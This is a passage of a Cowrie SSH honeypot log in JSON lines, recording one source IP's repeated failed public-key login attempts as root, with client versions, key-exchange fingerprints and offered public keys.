AAAAB3NzaC1yc2EAAAADAQABAAABgQCcPjOVNHzQQYmUsyG0fe4c9gQtdUQAmkvY29+0y6YWj4kmYTXWRfVEYFPLONSVZ+9BDGY9tBubE4eRrqO1eO+lR6GsOHhnKyXBJFIAd7vFDSK1kUtJfDcSpZNEnBo2579phREyJzOZ0uiwjGldtIiByJ1RtJ698hl7b3ERVG82DVyQj0og5BOlkmjyXmI3eWEONbH1DQH7vowZK150ZEOEPKuViB0z5T3Eg26ZMUgb/K2EPZLmhYREPk9a8l/tiYE/xFmjo33mRyOgM9+TAzV4GFjsdS25u2Q+38sFZ3uRDT89SkQoTzCKR+MFBEab5xsE36TIBd8+GsGSNLfOVWCMAwBxOKk70EdHUgwifQCF+9MaLhNOk/ZpVAc9j/npWsHOW2RlnOvI/mJ+YNBf7Xuo0M3bSZNYxQoelxl6b8mqauyrh0Vf+p9XuoBfPAI2dWNFfURMZXAQ4ksm7CXVi0U0S200Sim9U/GW7v5SbZRnAGaFeV4WH0uyo3nSiXx/XXM=","type":"ssh-rsa","message":"public key login attempt for [root] failed","sensor":"my-vps","timestamp":"2025-08-28T16:36:15.426076Z","src_ip":"212.227.235.229","session":"625a9b2d1f66"}
{"eventid":"cowrie.client.fingerprint","username":"root","fingerprint":"97:93:1e:9e:38:7f:73:6c:46:8f:0c:b3:40:1b:60:24","key":"ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQCcruNXAoSCo4DqHKGpCDVG1qo0B9fgztmP2LHQJ+XzCTcB6N7Mu5tatfaDFyiAORAISsiOrXLQDGaj/EGuVtoKec2YDNAdvR4PDpYMx1DNse91rMD/LFtwzjwCCdoyDzgT+mgfowEtTVabAfJWi4ZR/5zLxp0daUIopbd7Cn5xXyY/Fd42BwXHyTIz3iqlu9Fb5nJUJ49NRgfuSWl3sm67Cm3t5TE9s0lG3SE9yzlhR5K7jlVqyiXGHJuoSfCDiCfa655LPgyI+gkPNp44qE3G60w3Qp7flNuLVoEtg+xhlou5y3AsDYO8PRoZx3ohF+UYyMWIAJRlTZUKTg2m1CbR","type":"ssh-rsa","message":"public key attempt for user root of type ssh-rsa with fingerprint 97:93:1e:9e:38:7f:73:6c:46:8f:0c:b3:40:1b:60:24","sensor":"my-vps","timestamp":"2025-08-28T16:36:15.579309Z","src_ip":"212.227.235.229","session":"625a9b2d1f66"}
{"eventid":"cowrie.login.failed","username":"root","fingerprint":"97:93:1e:9e:38:7f:73:6c:46:8f:0c:b3:40:1b:60:24","key":"ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQCcruNXAoSCo4DqHKGpCDVG1qo0B9fgztmP2LHQJ+XzCTcB6N7Mu5tatfaDFyiAORAISsiOrXLQDGaj/EGuVtoKec2YDNAdvR4PDpYMx1DNse91rMD/LFtwzjwCCdoyDzgT+mgfowEtTVabAfJWi4ZR/5zLxp0daUIopbd7Cn5xXyY/Fd42BwXHyTIz3iqlu9Fb5nJUJ49NRgfuSWl3sm67Cm3t5TE9s0lG3SE9yzlhR5K7jlVqyiXGHJuoSfCDiCfa655LPgyI+gkPNp44qE3G60w3Qp7flNuLVoEtg+xhlou5y3AsDYO8PRoZx3ohF+UYyMWIAJRlTZUKTg2m1CbR","type":"ssh-rsa","message":"public key login attempt for [root] failed","sensor":"my-vps","timestamp":"2025-08-28T16:36:15.580727Z","src_ip":"212.227.235.229","session":"625a9b2d1f66"}
{"eventid":"cowrie.session.closed","duration":"0.8","message":"Connection lost after 0.8 seconds","sensor":"my-vps","timestamp":"2025-08-28T16:36:15.733848Z","src_ip":"212.227.235.229","session":"625a9b2d1f66"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":53390,"dst_ip":"1.2.3.4","dst_port":22,"session":"75d394a3ce87","protocol":"ssh","message":"New connection: 212.227.235.229:53390 (1.2.3.4:22) [session: 75d394a3ce87]","sensor":"my-vps","timestamp":"2025-08-28T16:36:15.877701Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-OpenSSH_8.9p19","message":"Remote SSH version: SSH-2.0-OpenSSH_8.9p19","sensor":"my-vps","timestamp":"2025-08-28T16:36:15.878631Z","src_ip":"212.227.235.229","session":"75d394a3ce87"}
{"eventid":"cowrie.client.kex","hassh":"98f63c4d9c87edbd97ed4747fa031019","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 98f63c4d9c87edbd97ed4747fa031019","sensor":"my-vps","timestamp":"2025-08-28T16:36:16.023054Z","src_ip":"212.227.235.229","session":"75d394a3ce87"}
{"eventid":"cowrie.client.fingerprint","username":"root","fingerprint":"2d:13:51:5e:4b:e7:30:a6:9c:0b:42:4e:96:4c:05:fb","key":"ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQCcPjOVNHzQQYmUsyG0fe4c9gQtdUQAmkvY29+0y6YWj4kmYTXWRfVEYFPLONSVZ+9BDGY9tBubE4eRrqO1eO+lR6GsOHhnKyXBJFIAd7vFDSK1kUtJfDcSpZNEnBo2579phREyJzOZ0uiwjGldtIiByJ1RtJ698hl7b3ERVG82DVyQj0og5BOlkmjyXmI3eWEONbH1DQH7vowZK150ZEOEPKuViB0z5T3Eg26ZMUgb/K2EPZLmhYREPk9a8l/tiYE/xFmjo33mRyOgM9+TAzV4GFjsdS25u2Q+38sFZ3uRDT89SkQoTzCKR+MFBEab5xsE36TIBd8+GsGSNLfOVWCMAwBxOKk70EdHUgwifQCF+9MaLhNOk/ZpVAc9j/npWsHOW2RlnOvI/mJ+YNBf7Xuo0M3bSZNYxQoelxl6b8mqauyrh0Vf+p9XuoBfPAI2dWNFfURMZXAQ4ksm7CXVi0U0S200Sim9U/GW7v5SbZRnAGaFeV4WH0uyo3nSiXx/XXM=","type":"ssh-rsa","message":"public key attempt for user root of type ssh-rsa with fingerprint 2d:13:51:5e:4b:e7:30:a6:9c:0b:42:4e:96:4c:05:fb","sensor":"my-vps","timestamp":"2025-08-28T16:36:16.314100Z","src_ip":"212.227.235.229","session":"75d394a3ce87"}
{"eventid":"cowrie.login.failed","username":"root","fingerprint":"2d:13:51:5e:4b:e7:30:a6:9c:0b:42:4e:96:4c:05:fb","key":"ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQCcPjOVNHzQQYmUsyG0fe4c9gQtdUQAmkvY29+0y6YWj4kmYTXWRfVEYFPLONSVZ+9BDGY9tBubE4eRrqO1eO+lR6GsOHhnKyXBJFIAd7vFDSK1kUtJfDcSpZNEnBo2579phREyJzOZ0uiwjGldtIiByJ1RtJ698hl7b3ERVG82DVyQj0og5BOlkmjyXmI3eWEONbH1DQH7vowZK150ZEOEPKuViB0z5T3Eg26ZMUgb/K2EPZLmhYREPk9a8l/tiYE/xFmjo33mRyOgM9+TAzV4GFjsdS25u2Q+38sFZ3uRDT89SkQoTzCKR+MFBEab5xsE36TIBd8+GsGSNLfOVWCMAwBxOKk70EdHUgwifQCF+9MaLhNOk/ZpVAc9j/npWsHOW2RlnOvI/mJ+YNBf7Xuo0M3bSZNYxQoelxl6b8mqauyrh0Vf+p9XuoBfPAI2dWNFfURMZXAQ4ksm7CXVi0U0S200Sim9U/GW7v5SbZRnAGaFeV4WH0uyo3nSiXx/XXM=","type":"ssh-rsa","message":"public key login attempt for [root] failed","sensor":"my-vps","timestamp":"2025-08-28T16:36:16.314766Z","src_ip":"212.227.235.229","session":"75d394a3ce87"}
{"eventid":"cowrie.client.fingerprint","username":"root","fingerprint":"2e:74:08:9b:32:69:af:2e:12:ef:7c:03:d4:e1:3e:9c","key":"ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAACAQCud5bccjEu8YTi4xchj62lhuitTn3wbLDyrHCvBFleUM8tnWbsRzI1rPcFtiRGB40gsCiN0v8QHCh66HLX+pY/eq/Qdhe5b+DYMaeDVDfM+SbI6UxZ0Af0U8PTWBWoamx/ziNqfJgNFFQm9zGDkF5xwhjlQBJbtb7vmtsMc2haVeugipytuiKYWNp/mRF3T9GizsWZ2loACwrnE+5Am6aZgOOP5D8sHbkjuPh7Vji2U6JssnAp4uOA5vEeLdj8skL5lX6cRKwYhBefGPFDLcsv9rFyM2909lIgnU4EsOFCcKnUwhe8UI/cgQHT01ldCTvIYEgULtAWOquu6Ac7I5U/XS35DIv7XfJKROXh7XBBqEQBWAODlkvJO1nP8nEx1eG2uQZWwOXApB0ShQ9lyZhPyk4ynegRgt/32+g5OMcHMs2QmdSTkLRp+VTpjp+zBAminix9UaPuHfA0PuLAALLY68nCleXpfF/DCEKSQqtWG69foRcHjmwfmWlGchLOkx5m0nQ6IjRp4fTX6tCDD4hjeUNnbyj9KOviOlGBX3ijxcFH0hEZu0WMvkIY9doSbYKFfTHJ7ufRSXMGw9ljvJkeVwNKUTliG2adesftpJhqH+6Mzr3cvINeHn5N9YJWqi1tVRLeTHss1BN/pnjMraGnqBZPNDSQJgayVf+jynOQ0Q==","type":"ssh-rsa","message":"public key attempt for user root of type ssh-rsa with fingerprint 2e:74:08:9b:32:69:af:2e:12:ef:7c:03:d4:e1:3e:9c","sensor":"my-vps","timestamp":"2025-08-28T16:36:16.461356Z","src_ip":"212.227.235.229","session":"75d394a3ce87"}
{"eventid":"cowrie.login.failed","username":"root","fingerprint":"2e:74:08:9b:32:69:af:2e:12:ef:7c:03:d4:e1:3e:9c","key":"ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAACAQCud5bccjEu8YTi4xchj62lhuitTn3wbLDyrHCvBFleUM8tnWbsRzI1rPcFtiRGB40gsCiN0v8QHCh66HLX+pY/eq/Qdhe5b+DYMaeDVDfM+SbI6UxZ0Af0U8PTWBWoamx/ziNqfJgNFFQm9zGDkF5xwhjlQBJbtb7vmtsMc2haVeugipytuiKYWNp/mRF3T9GizsWZ2loACwrnE+5Am6aZgOOP5D8sHbkjuPh7Vji2U6JssnAp4uOA5vEeLdj8skL5lX6cRKwYhBefGPFDLcsv9rFyM2909lIgnU4EsOFCcKnUwhe8UI/cgQHT01ldCTvIYEgULtAWOquu6Ac7I5U/XS35DIv7XfJKROXh7XBBqEQBWAODlkvJO1nP8nEx1eG2uQZWwOXApB0ShQ9lyZhPyk4ynegRgt/32+g5OMcHMs2QmdSTkLRp+VTpjp+zBAminix9UaPuHfA0PuLAALLY68nCleXpfF/DCEKSQqtWG69foRcHjmwfmWlGchLOkx5m0nQ6IjRp4fTX6tCDD4hjeUNnbyj9KOviOlGBX3ijxcFH0hEZu0WMvkIY9doSbYKFfTHJ7ufRSXMGw9ljvJkeVwNKUTliG2adesftpJhqH+6Mzr3cvINeHn5N9YJWqi1tVRLeTHss1BN/pnjMraGnqBZPNDSQJgayVf+jynOQ0Q==","type":"ssh-rsa","message":"public key login attempt for [root] failed","sensor":"my-vps","timestamp":"2025-08-28T16:36:16.461997Z","src_ip":"212.227.235.229","session":"75d394a3ce87"}
{"eventid":"cowrie.session.closed","duration":"0.7","message":"Connection lost after 0.7 seconds","sensor":"my-vps","timestamp":"2025-08-28T16:36:16.607638Z","src_ip":"212.227.235.229","session":"75d394a3ce87"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":53402,"dst_ip":"1.2.3.4","dst_port":22,"session":"e2cb2f3ef8ee","protocol":"ssh","message":"New connection: 212.227.235.229:53402 (1.2.3.4:22) [session: e2cb2f3ef8ee]","sensor":"my-vps","timestamp":"2025-08-28T16:36:16.759669Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-OpenSSH_8.9p19","message":"Remote SSH version: SSH-2.0-OpenSSH_8.9p19","sensor":"my-vps","timestamp":"2025-08-28T16:36:16.760353Z","src_ip":"212.227.235.229","session":"e2cb2f3ef8ee"}
{"eventid":"cowrie.client.kex","hassh":"98f63c4d9c87edbd97ed4747fa031019","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 98f63c4d9c87edbd97ed4747fa031019","sensor":"my-vps","timestamp":"2025-08-28T16:36:16.912486Z","src_ip":"212.227.235.229","session":"e2cb2f3ef8ee"}
{"eventid":"cowrie.client.fingerprint","username":"root","fingerprint":"2d:13:51:5e:4b:e7:30:a6:9c:0b:42:4e:96:4c:05:fb","key":"ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQCcPjOVNHzQQYmUsyG0fe4c9gQtdUQAmkvY29+0y6YWj4kmYTXWRfVEYFPLONSVZ+9BDGY9tBubE4eRrqO1eO+lR6GsOHhnKyXBJFIAd7vFDSK1kUtJfDcSpZNEnBo2579phREyJzOZ0uiwjGldtIiByJ1RtJ698hl7b3ERVG82DVyQj0og5BOlkmjyXmI3eWEONbH1DQH7vowZK150ZEOEPKuViB0z5T3Eg26ZMUgb/K2EPZLmhYREPk9a8l/tiYE/xFmjo33mRyOgM9+TAzV4GFjsdS25u2Q+38sFZ3uRDT89SkQoTzCKR+MFBEab5xsE36TIBd8+GsGSNLfOVWCMAwBxOKk70EdHUgwifQCF+9MaLhNOk/ZpVAc9j/npWsHOW2RlnOvI/mJ+YNBf7Xuo0M3bSZNYxQoelxl6b8mqauyrh0Vf+p9XuoBfPAI2dWNFfURMZXAQ4ksm7CXVi0U0S200Sim9U/GW7v5SbZRnAGaFeV4WH0uyo3nSiXx/XXM=","type":"ssh-rsa","message":"public key attempt for user root of type ssh-rsa with fingerprint 2d:13:51:5e:4b:e7:30:a6:9c:0b:42:4e:96:4c:05:fb","sensor":"my-vps","timestamp":"2025-08-28T16:36:17.218499Z","src_ip":"212.227.235.229","session":"e2cb2f3ef8ee"}
{"eventid":"cowrie.login.failed","username":"root","fingerprint":"2d:13:51:5e:4b:e7:30:a6:9c:0b:42:4e:96:4c:05:fb","key":"ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQCcPjOVNHzQQYmUsyG0fe4c9gQtdUQAmkvY29+0y6YWj4kmYTXWRfVEYFPLONSVZ+9BDGY9tBubE4eRrqO1eO+lR6GsOHhnKyXBJFIAd7vFDSK1kUtJfDcSpZNEnBo2579phREyJzOZ0uiwjGldtIiByJ1RtJ698hl7b3ERVG82DVyQj0og5BOlkmjyXmI3eWEONbH1DQH7vowZK150ZEOEPKuViB0z5T3Eg26ZMUgb/K2EPZLmhYREPk9a8l/tiYE/xFmjo33mRyOgM9+TAzV4GFjsdS25u2Q+38sFZ3uRDT89SkQoTzCKR+MFBEab5xsE36TIBd8+GsGSNLfOVWCMAwBxOKk70EdHUgwifQCF+9MaLhNOk/ZpVAc9j/npWsHOW2RlnOvI/mJ+YNBf7Xuo0M3bSZNYxQoelxl6b8mqauyrh0Vf+p9XuoBfPAI2dWNFfURMZXAQ4ksm7CXVi0U0S200Sim9U/GW7v5SbZRnAGaFeV4WH0uyo3nSiXx/XXM=","type":"ssh-rsa","message":"public key login attempt for [root] failed","sensor":"my-vps","timestamp":"2025-08-28T16:36:17.219240Z","src_ip":"212.227.235.229","session":"e2cb2f3ef8ee"}
{"eventid":"cowrie.client.fingerprint","username":"root","fingerprint":"46:1b:59:74:3e:24:19:b3:09:80:6d:32:33:a5:e4:d4","key":"ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAILZMR3AsV6mzndFLFF/oghW+bs9yVkvvvhhHGT7e167k","type":"ssh-ed25519","message":"public key attempt for user root of type ssh-ed25519 with fingerprint 46:1b:59:74:3e:24:19:b3:09:80:6d:32:33:a5:e4:d4","sensor":"my-vps","timestamp":"2025-08-28T16:36:17.373471Z","src_ip":"212.227.235.229","session":"e2cb2f3ef8ee"}
{"eventid":"cowrie.login.failed","username":"root","fingerprint":"46:1b:59:74:3e:24:19:b3:09:80:6d:32:33:a5:e4:d4","key":"ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAILZMR3AsV6mzndFLFF/oghW+bs9yVkvvvhhHGT7e167k","type":"ssh-ed25519","message":"public key login attempt for [root] failed","sensor":"my-vps","timestamp":"2025-08-28T16:36:17.374106Z","src_ip":"212.227.235.229","session":"e2cb2f3ef8ee"}
{"eventid":"cowrie.session.closed","duration":"0.8","message":"Connection lost after 0.8 seconds","sensor":"my-vps","timestamp":"2025-08-28T16:36:17.526940Z","src_ip":"212.227.235.229","session":"e2cb2f3ef8ee"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":53410,"dst_ip":"1.2.3.4","dst_port":22,"session":"409acde7048d","protocol":"ssh","message":"New connection: 212.227.235.229:53410 (1.2.3.4:22) [session: 409acde7048d]","sensor":"my-vps","timestamp":"2025-08-28T16:36:17.670191Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-OpenSSH_8.9p19","message":"Remote SSH version: SSH-2.0-OpenSSH_8.9p19","sensor":"my-vps","timestamp":"2025-08-28T16:36:17.671138Z","src_ip":"212.227.235.229","session":"409acde7048d"}
{"eventid":"cowrie.client.kex","hassh":"98f63c4d9c87edbd97ed4747fa031019","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 98f63c4d9c87edbd97ed4747fa031019","sensor":"my-vps","timestamp":"2025-08-28T16:36:17.815749Z","src_ip":"212.227.235.229","session":"409acde7048d"}
{"eventid":"cowrie.client.fingerprint","username":"root","fingerprint":"2d:13:51:5e:4b:e7:30:a6:9c:0b:42:4e:96:4c:05:fb","key":"ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQCcPjOVNHzQQYmUsyG0fe4c9gQtdUQAmkvY29+0y6YWj4kmYTXWRfVEYFPLONSVZ+9BDGY9tBubE4eRrqO1eO+lR6GsOHhnKyXBJFIAd7vFDSK1kUtJfDcSpZNEnBo2579phREyJzOZ0uiwjGldtIiByJ1RtJ698hl7b3ERVG82DVyQj0og5BOlkmjyXmI3eWEONbH1DQH7vowZK150ZEOEPKuViB0z5T3Eg26ZMUgb/K2EPZLmhYREPk9a8l/tiYE/xFmjo33mRyOgM9+TAzV4GFjsdS25u2Q+38sFZ3uRDT89SkQoTzCKR+MFBEab5xsE36TIBd8+GsGSNLfOVWCMAwBxOKk70EdHUgwifQCF+9MaLhNOk/ZpVAc9j/npWsHOW2RlnOvI/mJ+YNBf7Xuo0M3bSZNYxQoelxl6b8mqauyrh0Vf+p9XuoBfPAI2dWNFfURMZXAQ4ksm7CXVi0U0S200Sim9U/GW7v5SbZRnAGaFeV4WH0uyo3nSiXx/XXM=","type":"ssh-rsa","message":"public key attempt for user root of type ssh-rsa with fingerprint 2d:13:51:5e:4b:e7:30:a6:9c:0b:42:4e:96:4c:05:fb","sensor":"my-vps","timestamp":"2025-08-28T16:36:18.106614Z","src_ip":"212.227.235.229","session":"409acde7048d"}
{"eventid":"cowrie.login.failed","username":"root","fingerprint":"2d:13:51:5e:4b:e7:30:a6:9c:0b:42:4e:96:4c:05:fb","key":"ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQCcPjOVNHzQQYmUsyG0fe4c9gQtdUQAmkvY29+0y6YWj4kmYTXWRfVEYFPLONSVZ+9BDGY9tBubE4eRrqO1eO+lR6GsOHhnKyXBJFIAd7vFDSK1kUtJfDcSpZNEnBo2579phREyJzOZ0uiwjGldtIiByJ1RtJ698hl7b3ERVG82DVyQj0og5BOlkmjyXmI3eWEONbH1DQH7vowZK150ZEOEPKuViB0z5T3Eg26ZMUgb/K2EPZLmhYREPk9a8l/tiYE/xFmjo33mRyOgM9+TAzV4GFjsdS25u2Q+38sFZ3uRDT89SkQoTzCKR+MFBEab5xsE36TIBd8+GsGSNLfOVWCMAwBxOKk70EdHUgwifQCF+9MaLhNOk/ZpVAc9j/npWsHOW2RlnOvI/mJ+YNBf7Xuo0M3bSZNYxQoelxl6b8mqauyrh0Vf+p9XuoBfPAI2dWNFfURMZXAQ4ksm7CXVi0U0S200Sim9U/GW7v5SbZRnAGaFeV4WH0uyo3nSiXx/XXM=","type":"ssh-rsa","message":"public key login attempt for [root] failed","sensor":"my-vps","timestamp":"2025-08-28T16:36:18.108263Z","src_ip":"212.227.235.229","session":"409acde7048d"}
{"eventid":"cowrie.client.fingerprint","username":"root","fingerprint":"31:37:b7:f7:a7:6a:40:55:79:fe:90:69:de:35:05:67","key":"ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIGnSXQwfse2xGZ6wGn3ng++QmelqwRocuAXe82dFpc/3","type":"ssh-ed25519","message":"public key attempt for user root of type ssh-ed25519 with fingerprint 31:37:b7:f7:a7:6a:40:55:79:fe:90:69:de:35:05:67","sensor":"my-vps","timestamp":"2025-08-28T16:36:18.253833Z","src_ip":"212.227.235.229","session":"409acde7048d"}
{"eventid":"cowrie.login.failed","username":"root","fingerprint":"31:37:b7:f7:a7:6a:40:55:79:fe:90:69:de:35:05:67","key":"ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIGnSXQwfse2xGZ6wGn3ng++QmelqwRocuAXe82dFpc/3","type":"ssh-ed25519","message":"public key login attempt for [root] failed","sensor":"my-vps","timestamp":"2025-08-28T16:36:18.254589Z","src_ip":"212.227.235.229","session":"409acde7048d"}
{"eventid":"cowrie.session.closed","duration":"0.7","message":"Connection lost after 0.7 seconds","sensor":"my-vps","timestamp":"2025-08-28T16:36:18.399796Z","src_ip":"212.227.235.229","session":"409acde7048d"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":53424,"dst_ip":"1.2.3.4","dst_port":22,"session":"816cd22aec0b","protocol":"ssh","message":"New connection: 212.227.235.229:53424 (1.2.3.4:22) [session: 816cd22aec0b]","sensor":"my-vps","timestamp":"2025-08-28T16:36:18.551614Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-OpenSSH_8.9p19","message":"Remote SSH version: SSH-2.0-OpenSSH_8.9p19","sensor":"my-vps","timestamp":"2025-08-28T16:36:18.552428Z","src_ip":"212.227.235.229","session":"816cd22aec0b"}
{"eventid":"cowrie.client.kex","hassh":"98f63c4d9c87edbd97ed4747fa031019","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 98f63c4d9c87edbd97ed4747fa031019","sensor":"my-vps","timestamp":"2025-08-28T16:36:18.704525Z","src_ip":"212.227.235.229","session":"816cd22aec0b"}
{"eventid":"cowrie.client.fingerprint","username":"root","fingerprint":"2d:13:51:5e:4b:e7:30:a6:9c:0b:42:4e:96:4c:05:fb","key":"ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQCcPjOVNHzQQYmUsyG0fe4c9gQtdUQAmkvY29+0y6YWj4kmYTXWRfVEYFPLONSVZ+9BDGY9tBubE4eRrqO1eO+lR6GsOHhnKyXBJFIAd7vFDSK1kUtJfDcSpZNEnBo2579phREyJzOZ0uiwjGldtIiByJ1RtJ698hl7b3ERVG82DVyQj0og5BOlkmjyXmI3eWEONbH1DQH7vowZK150ZEOEPKuViB0z5T3Eg26ZMUgb/K2EPZLmhYREPk9a8l/tiYE/xFmjo33mRyOgM9+TAzV4GFjsdS25u2Q+38sFZ3uRDT89SkQoTzCKR+MFBEab5xsE36TIBd8+GsGSNLfOVWCMAwBxOKk70EdHUgwifQCF+9MaLhNOk/ZpVAc9j/npWsHOW2RlnOvI/mJ+YNBf7Xuo0M3bSZNYxQoelxl6b8mqauyrh0Vf+p9XuoBfPAI2dWNFfURMZXAQ4ksm7CXVi0U0S200Sim9U/GW7v5SbZRnAGaFeV4WH0uyo3nSiXx/XXM=","type":"ssh-rsa","message":"public key attempt for user root of type ssh-rsa with fingerprint 